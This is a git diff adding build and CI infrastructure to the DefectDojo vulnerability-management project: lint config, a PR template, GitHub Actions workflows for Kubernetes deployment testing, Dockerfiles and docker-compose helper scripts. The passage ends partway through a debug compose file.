diff --git a/.flake8 b/.flake8 new file mode 100644 index 00000000000..ea7e49a44bd --- /dev/null +++ b/.flake8 @@ -0,0 +1,41 @@ +[flake8] +# Documentation for flake8 http://flake8.pycqa.org/en/3.1.1/user/index.html +ignore = + # Suppress - line too long (> 79 characters) + E501 + # Suppress - Continuation line missing indentation or outdented + E127 + # Suppress - Function is too complex + C901 + # Multiple statements on one line + E704 + # Assign a lambda expression + E731 + # Bare except + E722 + # Local variable + F841 + # May be undefined + F405 + # list comprehension redefines + F812 + # module level imports + E402 + E126 + E128 + # line break after binary operator + W504 + # undefined file name excpetion + F821 + + +exclude = + # No need to traverse our git directory + .git, + # Exclude unittests + dojo/unittests, + # There's no value in checking cache directories + __pycache__, + # This contains of branch that we don't want to check + # dev +max-complexity = 10 diff --git a/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md b/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md new file mode 100644 index 00000000000..c3ad22f8fe2 --- /dev/null +++ b/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md @@ -0,0 +1,81 @@ +**Description** + +Describe the feature / bug fix implemented by this PR. +If this is a new parser, [the parser guide](https://defectdojo.github.io/django-DefectDojo/contributing/how-to-write-a-parser/) may be worth (re)reading. + +**Test results** + +Ideally you extend the test suite in `tests/` and `dojo/unittests` to cover the changed in this PR. +Alternatively, describe what you have and haven't tested. + +**Documentation** + +Please update any documentation when needed in the [documentation folder](https://github.com/DefectDojo/django-DefectDojo/tree/dev/docs)) + +**Checklist** + +This checklist is for your information. + +- [ ] Features/Changes/Bugfixes should be submitted against the `dev` branch by default. +- [ ] Make sure to rebase your PR against the very latest `dev`. +- [ ] Hotfixes should be submitted against master (urgent bugfixes requiring a hotfix release). +- [ ] Give a meaningful name to your PR, as it may end up being used in the release notes. +- [ ] Your code is flake8 compliant. +- [ ] Your code is python 3.6 compliant (specific python >3.6 syntax is currently not accepted). +- [ ] If this is a new feature and not a bug fix, you've included the proper documentation in the docs at https://github.com/DefectDojo/django-DefectDojo/tree/dev/docs as part of this PR. +- [ ] Model changes must include the necessary migrations in the dojo/db_migrations folder. +- [ ] Add applicable tests to the unit tests. +- [ ] Add the proper label to categorize your PR. + +**Extra information** + +Please clear everything below when submitting your pull request, it's here purely for your information. + +Moderators: Labels currently accepted for PRs: +- Import Scans (for new scanners/importers) +- enhancement +- performance +- feature +- bugfix +- maintenance (a.k.a chores) +- dependencies +- New Migration (when the PR introduces a DB migration) +- settings_changes (when the PR introduces changes or new settings in settings.dist.py) + +# Contributors: Git Tips +## Rebase on dev branch +If the dev branch has changed since you started working on it, please rebase your work after the current dev. + +On your working branch `mybranch`: +``` +git rebase dev mybranch +``` +In case of conflict: +``` + git mergetool + git rebase --continue + ``` + +When everything's fine on your local branch, force push to your `myOrigin` remote: +``` +git push myOrigin --force-with-lease +``` + +To cancel everything: +``` +git rebase --abort +``` + + +## Squashing commits +``` +git rebase -i origin/dev +``` +- Replace `pick` by `fixup` on the commits you want squashed out +- Replace `pick` by `reword` on the first commit if you want to change the commit message +- Save the file and quit your editor + +Force push to your `myOrigin` remote: +``` +git push myOrigin --force-with-lease +``` diff --git a/.github/workflows/flake8.yml b/.github/workflows/flake8.yml new file mode 100644 index 00000000000..83ff06b4b6b --- /dev/null +++ b/.github/workflows/flake8.yml @@ -0,0 +1,36 @@ +name: Flake8 +# pull requests: +# run on pull_request_target instead of just pull_request as we need write access to update the status check +on: + workflow_dispatch: + pull_request_target: + push: + +jobs: + flake8-your-pr: + runs-on: ubuntu-latest + steps: + - name: Checkout + if: github.event_name == 'pull_request' || github.event_name == 'pull_request_target' + uses: actions/checkout@v3 + # by default the pull_requst_target event checks out the base branch, i.e. dev + # so we need to explicitly checkout the head of the PR + # we use fetch-depth 0 to make sure the full history is checked out and we can compare against + # the base commit (branch) of the PR + # more info https://github.community/t/github-actions-are-severely-limited-on-prs/18179/16 + # we checkout merge_commit here as this contains all new code from dev also. we don't need to compare against base_commit + with: + persist-credentials: false + fetch-depth: 0 + ref: refs/pull/${{ github.event.pull_request.number }}/merge + # repository: ${{github.event.pull_request.head.repo.full_name}} + + - name: Checkout + # for non PR runs we just checkout the default, which is a sha on a branch probably + if: github.event_name != 'pull_request' && github.event_name != 'pull_request_target' + uses: actions/checkout@v3 + + # - uses: tayfun/flake8-your-pr@master + - uses: valentijnscholten/flake8-your-pr@master + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" diff --git a/.github/workflows/k8s-testing.yml b/.github/workflows/k8s-testing.yml new file mode 100644 index 00000000000..bf6f1845042 --- /dev/null +++ b/.github/workflows/k8s-testing.yml @@ -0,0 +1,269 @@ +name: k8s deployment +on: + pull_request: + push: + branches: + - master + - dev + - release/** + - hotfix/** + +env: + DD_DOCKER_REPO: defectdojo + DD_HOSTNAME: defectdojo.default.minikube.local + GITHUB_CACHE_REPO: containers.pkg.github.com + HELM_RABBIT_BROKER_SETTINGS: " \ + --set redis.enabled=false \ + --set rabbitmq.enabled=true \ + --set celery.broker=rabbitmq \ + --set createRabbitMqSecret=true \ + " + HELM_REDIS_BROKER_SETTINGS: " \ + --set redis.enabled=false \ + --set rabbitmq.enabled=true \ + --set celery.broker=rabbitmq \ + --set createRabbitMqSecret=true \ + " + HELM_MYSQL_DATABASE_SETTINGS: " \ + --set database=mysql \ + --set postgresql.enabled=false \ + --set mysql.enabled=true \ + --set createMysqlSecret=true \ + " + HELM_PG_DATABASE_SETTINGS: " \ + --set database=postgresql \ + --set postgresql.enabled=true \ + --set mysql.enabled=false \ + --set createPostgresqlSecret=true \ + " + HELM_PGHA_DATABASE_SETTINGS: " \ + --set database=postgresqlha \ + --set postgresql.enabled=false \ + --set mysql.enabled=false \ + --set postgresqlha.enabled=true \ + --set createPostgresqlHaSecret=true \ + --set createPostgresqlHaPgpoolSecret=true \ + " +jobs: + build: + name: Build Image + + runs-on: ubuntu-latest + + strategy: + matrix: + docker-image: [django, nginx] + + steps: + # - name: Login to DockerHub + # uses: docker/login-action@v1 + # with: + # username: ${{ secrets.DOCKERHUB_USERNAME }} + # password: ${{ secrets.DOCKERHUB_TOKEN }} + + - name: Checkout + uses: actions/checkout@v3 + with: + persist-credentials: false + + - name: Read Docker Image Identifiers + id: read-docker-image-identifiers + run: echo "IMAGE_REPOSITORY=$(echo ${{ github.repository }} | tr '[:upper:]' '[:lower:]')" >> $GITHUB_ENV + + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v2 + + - name: Cache Docker layers + uses: actions/cache@v3 + env: + docker-image: ${{ matrix.docker-image }} + with: + path: /tmp/.buildx-cache-${{ env.docker-image }} + key: ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ github.workflow }}-${{ github.sha }}-${{ github.run_id }} + restore-keys: | + ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ github.workflow }}-${{ github.sha }} + ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ github.workflow }} + ${{ runner.os }}-buildx-${{ env.docker-image }} + + - name: Build + id: docker_build + uses: docker/build-push-action@v3 + env: + docker-image: ${{ matrix.docker-image }} + with: + context: . + push: false + tags: | + ${{ env.DD_DOCKER_REPO }}/defectdojo-${{ env.docker-image }}:latest + file: Dockerfile.${{ env.docker-image }} + outputs: type=docker,dest=${{ env.docker-image }}_img + cache-from: type=local,src=/tmp/.buildx-cache-${{ env.docker-image }} + cache-to: type=local,dest=/tmp/.buildx-cache-${{ env.docker-image }} + + - name: Upload image ${{ env.docker-image }} as artifact + uses: actions/upload-artifact@v2 + with: + name: ${{ matrix.docker-image }} + path: ${{ matrix.docker-image }}_img + retention-days: 1 + + setting_minikube_cluster: + name: Kubernetes Deployment + + runs-on: ubuntu-18.04 + + needs: build + + strategy: + matrix: + include: + # databases, broker and k8s are independent, so we don't need to test each combination + # lastest k8s version (https://kubernetes.io/releases/) and oldest supported version from aws + # are tested (https://docs.aws.amazon.com/eks/latest/userguide/kubernetes-versions.html#available-versions) + - databases: pgsql + brokers: redis + k8s: 'v1.18.16' + - databases: mysql + brokers: rabbit + k8s: 'v1.18.16' + - databases: pgsql + brokers: rabbit + k8s: 'v1.22.0' + - databases: mysql + brokers: redis + k8s: 'v1.22.0' + - databases: pgsqlha + brokers: rabbit + k8s: 'v1.22.0' + + steps: +# - name: Login to DockerHub +# uses: docker/login-action@v1 +# with: +# username: ${{ secrets.DOCKERHUB_USERNAME }} +# password: ${{ secrets.DOCKERHUB_TOKEN }} + - name: Checkout + uses: actions/checkout@v3 + + - name: Setup Minikube + uses: manusa/actions-setup-minikube@v2.6.0 + with: + minikube version: 'v1.24.0' + kubernetes version: ${{ matrix.k8s }} + driver: docker + start args: '--addons=ingress --cni calico' + + - name: Status of minikube + run: |- + minikube status + + - name: Load images from artifacts + uses: actions/download-artifact@v3 + + - name: Load docker images + run: |- + eval $(minikube docker-env) + docker load -i nginx/nginx_img + docker load -i django/django_img + docker images + + - name: Configure HELM repos + run: |- + helm repo add bitnami https://charts.bitnami.com/bitnami + helm dependency list ./helm/defectdojo + helm dependency update ./helm/defectdojo + + - name: Set confings into Outputs + id: set + run: |- + echo ::set-output name=pgsql:: "${{ env.HELM_PG_DATABASE_SETTINGS }}" + echo ::set-output name=pgsqlha:: "${{ env.HELM_PGHA_DATABASE_SETTINGS }}" + echo ::set-output name=mysql:: "${{ env.HELM_MYSQL_DATABASE_SETTINGS }}" + echo ::set-output name=redis:: "${{ env.HELM_REDIS_BROKER_SETTINGS }}" + echo ::set-output name=rabbit:: "${{ env.HELM_RABBIT_BROKER_SETTINGS }}" + + # - name: Create image pull Secrets + # run: |- + # kubectl create secret docker-registry defectdojoregistrykey --docker-username=${{ secrets.DOCKERHUB_USERNAME }} --docker-password=${{ secrets.DOCKERHUB_TOKEN }} + # kubectl get secrets + - name: Deploying Djano application with ${{ matrix.databases }} ${{ matrix.brokers }} + run: |- + helm install \ + --timeout 800s \ + defectdojo \ + ./helm/defectdojo \ + --set django.ingress.enabled=true \ + --set imagePullPolicy=Never \ + ${{ steps.set.outputs[matrix.databases] }} \ + ${{ steps.set.outputs[matrix.brokers] }} \ + --set createSecret=true \ + # --set imagePullSecrets=defectdojoregistrykey + + - name: Check deployment status + run: |- + kubectl get pods + kubectl get ingress + kubectl get services + + - name: Check Application + run: |- + to_complete () { + kubectl wait --for=$1 $2 --timeout=500s --selector=$3 2>/tmp/test || true + if [[ -s /tmp/test ]]; then + echo "ERROR: $2" + cat /tmp/test + echo "INFO: status:" + kubectl get pods + echo "INFO: logs:" + kubectl logs --selector=$3 --all-containers=true + exit 1 + fi + return ${?} + } + echo "Waiting for init job..." + to_complete "condition=Complete" job "defectdojo.org/component=initializer" + echo "Waiting for celery pods..." + to_complete "condition=ready" pod "defectdojo.org/component=celery" + echo "Waiting for django pod..." + to_complete "condition=ready" pod "defectdojo.org/component=django" + echo "Pods up and ready to rumbole" + kubectl get pods + RETRY=0 + while : + do + OUT=$(kubectl run curl --quiet=true --image=curlimages/curl:7.73.0 \ + --overrides='{ "apiVersion": "v1" }' \ + --restart=Never -i --rm -- -s -m 20 -I --header "Host: $DD_HOSTNAME" http://`kubectl get service defectdojo-django -o json \ + | jq -r '.spec.clusterIP'`/login?next=/) + echo $OUT + CR=`echo $OUT | egrep "^HTTP" | cut -d' ' -f2` + echo $CR + if [[ $CR -ne 200 ]]; then + echo $RETRY + if [[ $RETRY -gt 2 ]]; then + kubectl get pods + echo `kubectl logs --tail=30 -l defectdojo.org/component=django -c uwsgi` + echo "ERROR: cannot display login screen; got HTTP code $CR" + exit 1 + else + ((RETRY++)) + echo "Attempt $RETRY to get login page" + sleep 5 + fi + else + echo "Result received" + break + fi + done + echo "Final Check of components" + errors=`kubectl get pods | grep Error | awk '{print $1}'` + if [[ ! -z $errors ]]; then + echo "Few pods with errors" + for line in $errors; do + echo "Dumping log from $line" + kubectl logs --tail 50 $line + done + exit 1 + else + echo "DD K8S successfully deployed" + fi diff --git a/.github/workflows/plantuml.yml b/.github/workflows/plantuml.yml new file mode 100644 index 00000000000..23fd31d4339 --- /dev/null +++ b/.github/workflows/plantuml.yml @@ -0,0 +1,42 @@ +name: Generate PlantUML Diagrams +on: + push: + paths: + - '**.puml' + branches: + - master + - dev +jobs: + ci: + runs-on: ubuntu-latest + env: + UML_FILES: ".puml" + steps: + - name: Checkout Source + uses: actions/checkout@v3 + with: + persist-credentials: false + + - name: Get changed UML files + id: getfile + run: | + echo "::set-output name=files::$(git diff-tree -r --no-commit-id --name-only ${{ github.sha }} | grep ${{ env.UML_FILES }} | xargs)" + - name: UML files considered echo output + run: | + echo ${{ steps.getfile.outputs.files }} + - name: Generate SVG Diagrams + uses: cloudbees/plantuml-github-action@master + with: + args: -v -tsvg ${{ steps.getfile.outputs.files }} + - name: Generate PNG Diagrams + uses: cloudbees/plantuml-github-action@master + with: + args: -v -tpng ${{ steps.getfile.outputs.files }} + - name: Push Local Changes + uses: stefanzweifel/git-auto-commit-action@v4.14.1 + with: + commit_user_name: "PlantUML_bot" + commit_user_email: "noreply@defectdojo.org" + commit_author: "PlantUML Bot " + commit_message: "Generate SVG and PNG images for PlantUML diagrams" + branch: ${{ github.head_ref }} diff --git a/Dockerfile.django b/Dockerfile.django new file mode 100644 index 00000000000..fbffabdbb56 --- /dev/null +++ b/Dockerfile.django @@ -0,0 +1,132 @@ + +# code: language=Dockerfile + +# The code for the build image should be identical with the code in +# Dockerfile.nginx to use the caching mechanism of Docker. + +# Ref: https://devguide.python.org/#branchstatus +FROM python:3.8.13-slim-bullseye@sha256:0e07cc072353e6b10de910d8acffa020a42467112ae6610aa90d6a3c56a74911 as base +FROM base as build +WORKDIR /app +RUN \ + apt-get -y update && \ + apt-get -y install --no-install-recommends \ + gcc \ + build-essential \ + dnsutils \ + default-mysql-client \ + libmariadb-dev-compat \ + postgresql-client \ + xmlsec1 \ + git \ + uuid-runtime \ + && \ + apt-get clean && \ + rm -rf /var/lib/apt/lists && \ + true +COPY requirements.txt ./ +# CPUCOUNT=1 is needed, otherwise the wheel for uwsgi won't always be build succesfully +# https://github.com/unbit/uwsgi/issues/1318#issuecomment-542238096 +RUN CPUCOUNT=1 pip3 wheel --wheel-dir=/tmp/wheels -r ./requirements.txt + +FROM base as django +WORKDIR /app +ARG uid=1001 +ARG gid=1337 +ARG appuser=defectdojo +ENV appuser ${appuser} +RUN \ + apt-get -y update && \ + # ugly fix to install postgresql-client without errors + mkdir -p /usr/share/man/man1 /usr/share/man/man7 && \ + apt-get -y install --no-install-recommends \ + # libopenjp2-7 libjpeg62 libtiff5 are required by the pillow package + libopenjp2-7 \ + libjpeg62 \ + libtiff5 \ + dnsutils \ + default-mysql-client \ + libmariadb3 \ + xmlsec1 \ + git \ + uuid-runtime \ + # only required for the dbshell (used by the initializer job) + postgresql-client \ + && \ + apt-get clean && \ + rm -rf /var/lib/apt/lists && \ + true +COPY --from=build /tmp/wheels /tmp/wheels +COPY requirements.txt ./ +RUN pip3 install \ + --no-cache-dir \ + --no-index \ + --find-links=/tmp/wheels \ + -r ./requirements.txt + +COPY \ + docker/entrypoint-celery-beat.sh \ + docker/entrypoint-celery-worker.sh \ + docker/entrypoint-initializer.sh \ + docker/entrypoint-uwsgi.sh \ + docker/entrypoint-uwsgi-dev.sh \ + docker/entrypoint-unit-tests.sh \ + docker/entrypoint-unit-tests-devDocker.sh \ + docker/wait-for-it.sh \ + docker/certs/* \ + / +COPY wsgi.py manage.py docker/unit-tests.sh ./ +COPY dojo/ ./dojo/ + +# Add extra fixtures to docker image which are loaded by the initializer +COPY docker/extra_fixtures/* /app/dojo/fixtures/ + +COPY tests/ ./tests/ +RUN \ + # Remove placeholder copied from docker/certs + rm -f /readme.txt && \ + # Remove placeholder copied from docker/extra_fixtures + rm -f dojo/fixtures/readme.txt && \ + mkdir -p dojo/migrations && \ + chmod g=u dojo/migrations && \ + true +USER root +RUN \ + addgroup --gid ${gid} ${appuser} && \ + adduser --system --no-create-home --disabled-password --gecos '' \ + --uid ${uid} --gid ${gid} ${appuser} && \ + chown -R root:root /app && \ + chmod -R u+rwX,go+rX,go-w /app && \ + # Allow for bind mounting local_settings.py and other setting overrides + chown -R root:${appuser} /app/dojo/settings && \ + chmod -R 775 /app/dojo/settings && \ + mkdir /var/run/${appuser} && \ + chown ${appuser} /var/run/${appuser} && \ + chmod g=u /var/run/${appuser} && \ + mkdir -p media/threat && chown -R ${uid} media +USER ${uid} +ENV \ + # Only variables that are not defined in settings.dist.py + DD_ADMIN_USER=admin \ + DD_ADMIN_MAIL=admin@defectdojo.local \ + DD_ADMIN_PASSWORD='' \ + DD_ADMIN_FIRST_NAME=Admin \ + DD_ADMIN_LAST_NAME=User \ + DD_CELERY_LOG_LEVEL="INFO" \ + DD_CELERY_WORKER_POOL_TYPE="solo" \ + # Enable prefork and options below to ramp-up celeryworker performance. Presets should work fine for a machine with 8GB of RAM, while still leaving room. + # See https://docs.celeryproject.org/en/stable/userguide/workers.html#id12 for more details + # DD_CELERY_WORKER_POOL_TYPE="prefork" \ + # DD_CELERY_WORKER_AUTOSCALE_MIN="2" \ + # DD_CELERY_WORKER_AUTOSCALE_MAX="8" \ + # DD_CELERY_WORKER_CONCURRENCY="8" \ + # DD_CELERY_WORKER_PREFETCH_MULTIPLIER="128" \ + DD_INITIALIZE=true \ + DD_UWSGI_MODE="socket" \ + DD_UWSGI_ENDPOINT="0.0.0.0:3031" \ + DD_UWSGI_NUM_OF_PROCESSES="2" \ + DD_UWSGI_NUM_OF_THREADS="2" +ENTRYPOINT ["/entrypoint-uwsgi.sh"] + +FROM django as django-unittests +COPY unittests/ ./unittests/ diff --git a/Dockerfile.integration-tests b/Dockerfile.integration-tests new file mode 100644 index 00000000000..6c5675ac2e3 --- /dev/null +++ b/Dockerfile.integration-tests @@ -0,0 +1,54 @@ + +# code: language=Dockerfile + +FROM python:3.8.13-slim-bullseye@sha256:0e07cc072353e6b10de910d8acffa020a42467112ae6610aa90d6a3c56a74911 as build +WORKDIR /app +RUN \ + apt-get -y update && \ + apt-get -y install \ + git \ + wget \ + curl \ + unzip \ + gpg \ + && \ + apt-get clean && \ + rm -rf /var/lib/apt/lists && \ + true + +# Installing Google Chrome browser +RUN \ + curl -sS -o - https://dl.google.com/linux/linux_signing_key.pub | apt-key add && \ + echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google-chrome.list && \ + apt-get -y update && \ + apt-get -y install \ + google-chrome-stable \ + && \ + apt-get clean && \ + rm -rf /var/lib/apt/lists && \ + true + +RUN pip install --no-cache-dir selenium requests chromedriver-autoinstaller + +# Installing Chromedriver +WORKDIR /opt/chrome-driver +RUN \ + python -c "import chromedriver_autoinstaller; chromedriver_autoinstaller.install(cwd=True)" && \ + chmod -R 0755 . +WORKDIR /app + +COPY docker/wait-for-it.sh \ + docker/entrypoint-integration-tests.sh \ + / + +COPY tests/ ./tests/ + +RUN chmod -R 0777 /app + +ARG uid=1001 +USER ${uid} +ENV \ + DD_ADMIN_USER=admin \ + DD_ADMIN_PASSWORD='' \ + DD_BASE_URL="http://localhost:8080/" +CMD ["/entrypoint-integration-tests.sh"] diff --git a/Dockerfile.nginx b/Dockerfile.nginx new file mode 100644 index 00000000000..6c816f56f4f --- /dev/null +++ b/Dockerfile.nginx @@ -0,0 +1,100 @@ + +# code: language=Dockerfile + +# The code for the build image should be identical with the code in +# Dockerfile.django to use the caching mechanism of Docker. + +# Ref: https://devguide.python.org/#branchstatus +FROM python:3.8.13-slim-bullseye@sha256:0e07cc072353e6b10de910d8acffa020a42467112ae6610aa90d6a3c56a74911 as base +FROM base as build +WORKDIR /app +RUN \ + apt-get -y update && \ + apt-get -y install --no-install-recommends \ + gcc \ + build-essential \ + dnsutils \ + default-mysql-client \ + libmariadb-dev-compat \ + postgresql-client \ + xmlsec1 \ + git \ + uuid-runtime \ + && \ + apt-get clean && \ + rm -rf /var/lib/apt/lists && \ + true +COPY requirements.txt ./ +# CPUCOUNT=1 is needed, otherwise the wheel for uwsgi won't always be build succesfully +# https://github.com/unbit/uwsgi/issues/1318#issuecomment-542238096 +RUN CPUCOUNT=1 pip3 wheel --wheel-dir=/tmp/wheels -r ./requirements.txt + + +FROM build AS collectstatic + +USER root +ENV \ + # This will point yarn to whatever version of node you decide to use + # due to the use of nodejs instead of node name in some distros + node="nodejs" +RUN \ + apt-get -y update && \ + apt-get -y install --no-install-recommends apt-transport-https ca-certificates curl wget gnupg && \ + curl -sSL https://deb.nodesource.com/gpgkey/nodesource.gpg.key | apt-key add --no-tty - && \ + echo 'deb https://deb.nodesource.com/node_14.x bullseye main' > /etc/apt/sources.list.d/nodesource.list && \ + echo 'deb-src https://deb.nodesource.com/node_14.x bullseye main' >> /etc/apt/sources.list.d/nodesource.list && \ + apt-get update -y -o Dir::Etc::sourcelist="sources.list.d/nodesource.list" \ + -o Dir::Etc::sourceparts="-" -o APT::Get::List-Cleanup="0" && \ + curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | apt-key add - && \ + wget https://github.com/yarnpkg/yarn/releases/download/v1.22.10/yarn_1.22.10_all.deb && \ + dpkg -i yarn_1.22.10_all.deb && \ + echo "$(yarn --version)" && \ + apt-get -y install --no-install-recommends nodejs && \ + echo "$(node --version)" && \ + apt-get clean && \ + rm yarn_1.22.10_all.deb && \ + rm -rf /var/lib/apt/lists && \ + true + +RUN pip3 install \ + --no-cache-dir \ + --no-index \ + --find-links=/tmp/wheels \ + -r ./requirements.txt + +COPY components/ ./components/ +RUN \ + cd components && \ + yarn + +COPY manage.py ./ +COPY dojo/ ./dojo/ + +RUN env DD_SECRET_KEY='.' python3 manage.py collectstatic --noinput && true + +FROM nginx:1.23.0-alpine@sha256:8e38930f0390cbd79b2d1528405fb17edcda5f4a30875ecf338ebaa598dc994e +ARG uid=1001 +ARG appuser=defectdojo +COPY --from=collectstatic /app/static/ /usr/share/nginx/html/static/ +COPY wsgi_params nginx/nginx.conf nginx/nginx_TLS.conf /etc/nginx/ +COPY docker/entrypoint-nginx.sh / +RUN \ + apk add --no-cache openssl && \ + chmod -R g=u /var/cache/nginx && \ + mkdir /var/run/defectdojo && \ + chmod -R g=u /var/run/defectdojo && \ + mkdir -p /etc/nginx/ssl && \ + chmod -R g=u /etc/nginx && \ + true +ENV \ + DD_UWSGI_PASS="uwsgi_server" \ + DD_UWSGI_HOST="uwsgi" \ + DD_UWSGI_PORT="3031" \ + GENERATE_TLS_CERTIFICATE="false" \ + USE_TLS="false" \ + NGINX_METRICS_ENABLED="false" \ + METRICS_HTTP_AUTH_USER="" \ + METRICS_HTTP_AUTH_PASSWORD="" +USER ${uid} +EXPOSE 8080 +ENTRYPOINT ["/entrypoint-nginx.sh"] diff --git a/_config.yml b/_config.yml new file mode 100644 index 00000000000..c4192631f25 --- /dev/null +++ b/_config.yml @@ -0,0 +1 @@ +theme: jekyll-theme-cayman \ No newline at end of file diff --git a/dc-build.sh b/dc-build.sh new file mode 100755 index 00000000000..c0595822bbf --- /dev/null +++ b/dc-build.sh @@ -0,0 +1,15 @@ +#/bin/bash + +bash ./docker/docker-compose-check.sh +if [[ $? -eq 1 ]]; then exit 1; fi + +if [ $# -eq 0 ] +then + echo "Building docker compose" +else + echo "Building docker compose with additional parameter $1 ..." +fi + +# Building images for all configurations +# The docker build doesn't supply any environment variables to the Dockerfile, so we can use any profile. +docker-compose --profile mysql-rabbitmq --profile postgres-redis --env-file ./docker/environments/mysql-rabbitmq.env build $1 diff --git a/dc-down.sh b/dc-down.sh new file mode 100755 index 00000000000..2bf27de0b31 --- /dev/null +++ b/dc-down.sh @@ -0,0 +1,15 @@ +#/bin/bash + +bash ./docker/docker-compose-check.sh +if [[ $? -eq 1 ]]; then exit 1; fi + +if [ $# -eq 0 ] +then + echo "Stopping docker compose and removing containers" +else + echo "Stopping docker compose and removing containers with additional parameter $1 ..." +fi + +# Stopping containers for all configurations +# The environment must be provided but it doesn't make a difference which one +docker-compose --profile mysql-rabbitmq --profile postgres-redis --env-file ./docker/environments/mysql-rabbitmq.env down $1 diff --git a/dc-stop.sh b/dc-stop.sh new file mode 100755 index 00000000000..ec08318ea68 --- /dev/null +++ b/dc-stop.sh @@ -0,0 +1,15 @@ +#/bin/bash + +bash ./docker/docker-compose-check.sh +if [[ $? -eq 1 ]]; then exit 1; fi + +if [ $# -eq 0 ] +then + echo "Stopping docker compose" +else + echo "Stopping docker compose with additional parameter $1 ..." +fi + +# Stopping containers for all configurations +# The environment must be provided but it doesn't make a difference which one +docker-compose --profile mysql-rabbitmq --profile postgres-redis --env-file ./docker/environments/mysql-rabbitmq.env stop $1 diff --git a/dc-unittest.sh b/dc-unittest.sh new file mode 100755 index 00000000000..54cd6fdce1e --- /dev/null +++ b/dc-unittest.sh @@ -0,0 +1,76 @@ +#/bin/env bash + +unset PROFILE +unset TEST_CASE + +bash ./docker/docker-compose-check.sh +if [[ $? -eq 1 ]]; then exit 1; fi + +usage() { + echo + echo "This script helps with running unit tests." + echo + echo "Options:" + echo " --profile -p {DOCKER_PROFILE_NAME}" + echo " --test-case -t {YOUR_FULLY_QUALIFIED_TEST_CASE}" + echo + echo " --help -h - prints this dialogue." + echo + echo "Environment Variables:" + echo " DD_PROFILE={DOCKER_PROFILE_NAME}" + echo + echo "You must specify a test case (arg) and profile (arg or env var)!" + echo + echo "Example command:" + echo "./dc-unittest.sh --profile mysql-rabbitmq --test-case unittests.tools.test_stackhawk_parser.TestStackHawkParser" +} + +while [[ $# -gt 0 ]]; do + case $1 in + -p|--profile) + PROFILE="$2" + shift # past argument + shift # past value + ;; + -t|--test-case) + TEST_CASE="$2" + shift # past argument + shift # past value + ;; + -h|--help) + usage + exit 0 + ;; + -*|--*) + echo "Unknown option $1" + usage + exit 1 + ;; + *) + POSITIONAL_ARGS+=("$1") # save positional arg + shift # past argument + ;; + esac +done + +if [ -z $PROFILE ] +then + if [ -z $DD_PROFILE ] + then + echo "No profile supplied." + usage + exit 1 + else + PROFILE=$DD_PROFILE + fi +fi + +if [ -z $TEST_CASE ] +then + echo "No test case supplied." + usage + exit 1 +fi + +echo "Running docker compose unit tests with profile $PROFILE and test case $TEST_CASE ..." +docker-compose --profile $PROFILE --env-file ./docker/environments/$PROFILE.env exec uwsgi bash -c "python manage.py test $TEST_CASE -v2" diff --git a/dc-up-d.sh b/dc-up-d.sh new file mode 100755 index 00000000000..b547fcc4401 --- /dev/null +++ b/dc-up-d.sh @@ -0,0 +1,30 @@ +#/bin/bash + +unset PROFILE + +bash ./docker/docker-compose-check.sh +if [[ $? -eq 1 ]]; then exit 1; fi + +if [ $# -eq 0 ] +then + if [ -z $DD_PROFILE ] + then + echo "No profile supplied, running default: mysql-rabbitmq" + PROFILE="mysql-rabbitmq" + echo "Other supported profiles: + mysql-rabbitmq* + mysql-redis + postgres-rabbitmq + postgres-redis + + Usage example: ./dc-up-d.sh mysql-redis + " + else + PROFILE=$DD_PROFILE + fi +else + PROFILE=$1 +fi + +echo "Starting docker compose with profile $PROFILE in the background ..." +docker-compose --profile $PROFILE --env-file ./docker/environments/$PROFILE.env up --no-deps -d diff --git a/dc-up.sh b/dc-up.sh new file mode 100755 index 00000000000..7ffd3052788 --- /dev/null +++ b/dc-up.sh @@ -0,0 +1,29 @@ +#/bin/bash + +unset PROFILE + +bash ./docker/docker-compose-check.sh +if [[ $? -eq 1 ]]; then exit 1; fi + +if [ $# -eq 0 ]; then + if [ -z $DD_PROFILE ] + then + echo "No profile supplied, running default: mysql-rabbitmq" + PROFILE="mysql-rabbitmq" + echo "Other supported profiles: + mysql-rabbitmq* + mysql-redis + postgres-rabbitmq + postgres-redis + + Usage example: ./dc-up.sh mysql-redis + " + else + PROFILE=$DD_PROFILE + fi +else + PROFILE=$1 +fi + +echo "Starting docker compose with profile $PROFILE in the foreground ..." +docker-compose --profile $PROFILE --env-file ./docker/environments/$PROFILE.env up --no-deps diff --git a/docker-compose.override.debug.yml b/docker-compose.override.debug.yml new file mode 100644 index 00000000000..40bb4e4c335 --- /dev/null +++ b/docker-compose.override.debug.yml @@ -0,0 +1,59 @@ +--- +version: '3.8' +services: + uwsgi: + entrypoint: ['/wait-for-it.sh', '${DD_DATABASE_HOST}:${DD_DATABASE_PORT}', '-t', '30', '--', '/entrypoint-uwsgi-dev.sh'] + volumes: + - '.:/app:z' + environment: + DD_DEBUG: 'True' + DD_ADMIN_USER: "${DD_ADMIN_USER:-admin}" + DD_ADMIN_PASSWORD: "${DD_ADMIN_PASSWORD:-admin}" + DD_EMAIL_URL: "smtp://mailhog:1025" + ports: + - target: ${DD_DEBUG_PORT:-3000} + published: ${DD_DEBUG_PORT:-3000} + protocol: tcp + mode: host + celeryworker: + volumes: + - '.:/app:z' + environment: + DD_EMAIL_URL: "smtp://mailhog:1025" + celerybeat: + volumes: + - '.:/app:z' + initializer: + volumes: + - '.:/app:z' + environment: + DD_ADMIN_USER: "${DD_ADMIN_USER:-admin}" + DD_ADMIN_PASSWORD: "${DD_ADMIN_PASSWORD:-admin}" + nginx: + volumes: + - './dojo/static/dojo:/usr/share/nginx/html/static/dojo' + mysql: + ports: + - target: ${DD_DATABASE_PORT} + published: ${DD_DATABASE_PORT} + protocol: tcp + mode: host + postgres: + ports: + - target: ${DD_DATABASE_PORT} + published: ${DD_DATABASE_PORT} + protocol: tcp + mode: host + mailhog: + image: mailhog/mailhog:v1.0.1@sha256:8d76a3d4ffa32a3661311944007a415332c4bb855657f4f6c57996405c009bea + entrypoint: [ "/bin/sh", "-c", "MailHog &>/dev/null" ] + # inspired by https://github.com/mailhog/MailHog/issues/56#issuecomment-291968642 + ports: + - target: 1025 + published: 1025 + protocol: tcp + mode: host + - target: 8025 + published: 